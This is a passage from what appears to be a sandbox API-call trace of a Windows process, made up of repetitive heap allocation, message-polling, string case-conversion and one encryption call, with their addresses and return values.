dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.234] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0200.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0200.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.252] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.252] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.253] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.253] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.254] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.254] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.254] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0200.263] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.263] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.264] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.264] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.264] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.264] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.265] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.265] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.265] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.265] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.266] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.266] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.266] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.266] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.266] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.266] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.266] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.267] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x1a51, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x1a58) returned 1 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24f8cc0 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0200.268] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.268] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.268] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.268] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.269] CharLowerBuffW (in: lpsz="byte[6744]", cchLength=0xa | out: lpsz="byte[6744]") returned 0xa [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0200.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.270] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.270] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.270] RtlAllocateHeap 